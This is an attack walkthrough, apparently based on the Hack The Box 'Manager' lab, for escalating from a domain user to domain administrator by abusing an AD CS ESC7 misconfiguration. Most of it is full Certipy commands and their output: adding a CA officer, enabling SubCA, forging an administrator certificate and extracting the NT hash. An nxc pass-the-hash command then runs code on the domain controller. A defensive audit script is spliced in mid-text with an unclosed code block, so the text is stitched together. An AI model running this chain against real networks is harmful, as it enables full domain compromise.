# 1. Use case

## 1.1 Requirements: a certificate server (AD CS) with a misconfiguration, plus the password or hash of a domain user
# 2. Steps

(Before following these steps, read section 3, Notes and pitfalls, first.)
## 2.1 Enumerate the certificate configuration as the domain user

Once you have a domain user's hash or password, use the Certipy tool to remotely read the certificate configuration and check it for misconfigurations. If any are found, Certipy reports that a vulnerability exists and prints its name:

```powershell
certipy.exe find -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -vulnerable -stdout
```

Output:

```text
PS D:\miniconda\Scripts> certipy.exe find -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : manager-DC01-CA
    DNS Name                            : dc01.manager.htb
    Certificate Subject                 : CN=manager-DC01-CA, DC=manager, DC=htb
    Certificate Serial Number           : 5150CE6EC048749448C7390A52F264BB
    Certificate Validity Start          : 2023-07-27 10:21:05+00:00
    Certificate Validity End            : 2122-07-27 10:31:04+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : MANAGER.HTB\Administrators
      Access Rights
        Enroll                          : MANAGER.HTB\Operator
                                          MANAGER.HTB\Authenticated Users
                                          MANAGER.HTB\Raven
        ManageCertificates              : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
        ManageCa                        : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
                                          MANAGER.HTB\Raven
    [!] Vulnerabilities
      ESC7                              : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates                   : [!] Could not find any certificate templates
PS D:\miniconda\Scripts>
```
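The ESC7 finding above boils down to one condition: a principal that is not a CA administrator holds `ManageCa` or `ManageCertificates` on the CA. The following audit script is an added example (not part of Certipy and not from the original post); it parses the `Certificate Authorities` block in the same layout Certipy prints with `-stdout` and reports every such grant, so a defender can run it over saved enumeration output from a review. The sample text is constructed from the values shown above, and the list of principals that are allowed to hold CA management rights (the built-in `Administrators`, `Domain Admins` and `Enterprise Admins` groups) is an assumption to adjust for a domain with a dedicated PKI-admin group.

```python
"""Audit helper (added example, not part of Certipy): parse the
'Certificate Authorities' section of `certipy find -stdout` output and
flag ESC7-style CA permissions, i.e. ManageCa / ManageCertificates held by
a principal outside the expected administrative groups."""
import re
from dataclasses import dataclass, field

# Principals expected to hold CA management rights. Assumption: default
# group names; extend this tuple for a custom PKI-admin group.
PRIVILEGED_SUFFIXES = ("\\Administrators", "\\Domain Admins", "\\Enterprise Admins")

# Constructed sample mirroring the enumeration layout above (values copied
# from the page; nothing here is read from a live CA).
SAMPLE_OUTPUT = """\
Certificate Authorities
  0
    CA Name                             : manager-DC01-CA
    DNS Name                            : dc01.manager.htb
    Permissions
      Owner                             : MANAGER.HTB\\Administrators
      Access Rights
        Enroll                          : MANAGER.HTB\\Operator
                                          MANAGER.HTB\\Authenticated Users
                                          MANAGER.HTB\\Raven
        ManageCertificates              : MANAGER.HTB\\Administrators
                                          MANAGER.HTB\\Domain Admins
                                          MANAGER.HTB\\Enterprise Admins
        ManageCa                        : MANAGER.HTB\\Administrators
                                          MANAGER.HTB\\Domain Admins
                                          MANAGER.HTB\\Enterprise Admins
                                          MANAGER.HTB\\Raven
"""


@dataclass
class CaAccessRights:
    ca_name: str
    rights: dict = field(default_factory=dict)  # right name -> list of principals


def parse_access_rights(text: str) -> list[CaAccessRights]:
    """Collect the 'Access Rights' block of every CA in the enumeration text.

    The block is delimited by indentation: right names sit one level below
    the 'Access Rights' header, continuation lines (extra principals for the
    same right) sit deeper still, and any line dedented back to the header's
    level or above ends the block.
    """
    cas: list[CaAccessRights] = []
    rights_indent = None  # indent of the 'Access Rights' header while inside it
    current_right = None
    for line in text.splitlines():
        if not line.strip():
            continue
        indent = len(line) - len(line.lstrip())
        stripped = line.strip()
        m = re.match(r"CA Name\s*:\s*(.+)$", stripped)
        if m:
            cas.append(CaAccessRights(m.group(1).strip()))
            rights_indent = None
            current_right = None
            continue
        if not cas:
            continue
        if stripped == "Access Rights":
            rights_indent = indent
            current_right = None
            continue
        if rights_indent is None:
            continue
        if indent <= rights_indent:
            # Dedented (e.g. '[!] Vulnerabilities' or 'Certificate Templates'):
            # the Access Rights block is over.
            rights_indent = None
            current_right = None
            continue
        m = re.match(r"(\w+)\s*:\s*(.+)$", stripped)
        if m:
            current_right = m.group(1)
            cas[-1].rights.setdefault(current_right, []).append(m.group(2).strip())
        elif current_right is not None:
            cas[-1].rights[current_right].append(stripped)
    return cas


def is_privileged(principal: str) -> bool:
    """True if the principal is one of the groups allowed to manage the CA."""
    return principal.endswith(PRIVILEGED_SUFFIXES)


def find_esc7(cas: list[CaAccessRights]) -> list[tuple[str, str, str]]:
    """Return (ca_name, right, principal) for every dangerous grant.

    ManageCa lets its holder add officers and enable templates, and
    ManageCertificates lets its holder approve pending requests, so either
    right in the hands of an ordinary user is reported.
    """
    findings = []
    for ca in cas:
        for right in ("ManageCa", "ManageCertificates"):
            for principal in ca.rights.get(right, []):
                if not is_privileged(principal):
                    findings.append((ca.ca_name, right, principal))
    return findings


if __name__ == "__main__":
    for ca_name, right, principal in find_esc7(parse_access_rights(SAMPLE_OUTPUT)):
        print(f"[ESC7] {ca_name}: '{principal}' holds {right}; remove it in the CA's Security tab")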
## 2.2 Exploit the identified vulnerability (ESC7) remotely

### 2.2.1 Create the certificate: add the user as a CA officer

```powershell
certipy.exe ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236
```

Output:

```text
PS D:\miniconda\Scripts> .\certipy.exe ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
PS D:\miniconda\Scripts>
```
### 2.2.2 Enable the certificate template

```powershell
certipy.exe ca -ca 'manager-DC01-CA' -enable-template SubCA -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236
```

Output:

```text
PS D:\miniconda\Scripts> .\certipy.exe ca -ca 'manager-DC01-CA' -enable-template SubCA -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'
PS D:\miniconda\Scripts>
```
### 2.2.3 Request a certificate (the request is denied); save the private key and note the request ID

```powershell
certipy.exe req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -template SubCA -upn administrator@manager.htb -dc-ip 10.10.11.236
```

Output:

```text
PS D:\miniconda\Scripts> certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -template SubCA -upn administrator@manager.htb -dc-ip 10.10.11.236
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 26
Would you like to save the private key? (y/N) y
[*] Saved private key to 26.key
[-] Failed to request certificate
PS D:\miniconda\Scripts>
```
### 2.2.4 Issue and approve the certificate

```powershell
certipy.exe ca -ca 'manager-DC01-CA' -issue-request 26 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236
```

Output:

```text
PS D:\miniconda\Scripts> .\certipy.exe ca -ca 'manager-DC01-CA' -issue-request 26 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully issued certificate
```
### 2.2.5 Retrieve the issued certificate by request ID and save the credential file (administrator.pfx)

```powershell
certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -retrieve 26 -dc-ip 10.10.11.236
```

Output:

```text
PS D:\miniconda\Scripts> certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -retrieve 26 -dc-ip 10.10.11.236
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Rerieving certificate with ID 26
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '26.key'
[*] Saved certificate and private key to 'administrator.pfx'
```
## 2.3 Dump the hash and move laterally with pass-the-hash

### 2.3.1 Synchronize time with the domain controller (otherwise authentication fails)

Linux sync command:

```bash
sudo ntpdate -s 10.10.11.236
```

Windows sync commands:

```powershell
sc start w32time
w32tm /config /manualpeerlist:"10.129.102.122" /syncfromflags:manual /reliable:YES /update
```
### 2.3.2 Dump the domain admin hash using the downloaded certificate file

```powershell
certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'manager.htb' -dc-ip 10.10.11.236
```

Output:

```text
PS D:\miniconda\Scripts> certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'manager.htb' -dc-ip 10.10.11.236
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
```
### 2.3.3 Pass-the-hash lateral movement to take over the domain controller

```powershell
nxc.exe wmi 10.10.11.236 -u administrator -H ae5064c2f62317332c88629e025924ef -x 'whoami'
```

Output:

```text
PS E:\渗透工具\提权+内网\密码喷洒> .\nxc.exe wmi 10.10.11.236 -u administrator -H ae5064c2f62317332c88629e025924ef -x 'whoami'
RPC         10.10.11.236    135    DC01             [*] Windows NT 10.0 Build 17763 (name:DC01) (domain:manager.htb)
WMI         10.10.11.236    135    DC01             [+] manager.htb\administrator:ae5064c2f62317332c88629e025924ef (Pwn3d!)
WMI         10.10.11.236    135    DC01             [+] Executed command: "whoami" via wmiexec
WMI         10.10.11.236    135    DC01             manager\administrator
```
# 3. Notes and pitfalls

1. In 2.2.1 (Create the certificate): the CA name (`-ca 'manager-DC01-CA'`) is taken from the `CA Name` field in the output of 2.1 (Enumerate the certificate configuration).
2. In 2.2.4 (Issue and approve the certificate): the request ID (`-issue-request 26`) is taken from the output of 2.2.3 (Request a certificate).
3. Time synchronization: the clock must be synchronized with the domain controller, otherwise authentication fails (see 2.3.1).
Extra: Certipy command reference

Help output of `certipy shadow`:

```text
Certipy v4.0.0 - by Oliver Lyak (ly4k)

usage: certipy shadow [-h] [-account target account] [-device-id DEVICE_ID] [-debug] [-out output file name] [-scheme ldap scheme] [-dc-ip ip address] [-target-ip ip address] [-target dns/ip address] [-ns nameserver] [-dns-tcp] [-timeout seconds] [-u username@domain] [-p password] [-hashes [LMHASH:]NTHASH] [-k] [-sspi] [-aes hex key] [-no-pass] {list,add,remove,clear,info,auto}

positional arguments:
  {list,add,remove,clear,info,auto}
                        Key Credentials action

optional arguments:
  -h, --help            show this help message and exit
  -account target account
                        Account to target. If omitted, the user specified in the target will be used
  -device-id DEVICE_ID  Device ID of the Key Credential Link
  -debug                Turn debug output on

output options:
  -out output file name

connection options:
  -scheme ldap scheme
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
  -target-ip ip address
                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot resolve it
  -target dns/ip address
                        DNS Name or IP Address of the target machine. Required for Kerberos or SSPI authentication
  -ns nameserver        Nameserver for DNS resolution
  -dns-tcp              Use TCP instead of UDP for DNS queries
  -timeout seconds      Timeout for connections

authentication options:
  -u username@domain, -username username@domain
                        Username. Format: username@domain
  -p password, -password password
                        Password
  -hashes [LMHASH:]NTHASH
                        NTLM hash, format is [LMHASH:]NTHASH
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line
  -sspi                 Use Windows Integrated Authentication (SSPI)
  -aes hex key          AES key to use for Kerberos Authentication (128 or 256 bits)
  -no-pass              Don't ask for password (useful for -k and -sspi)
```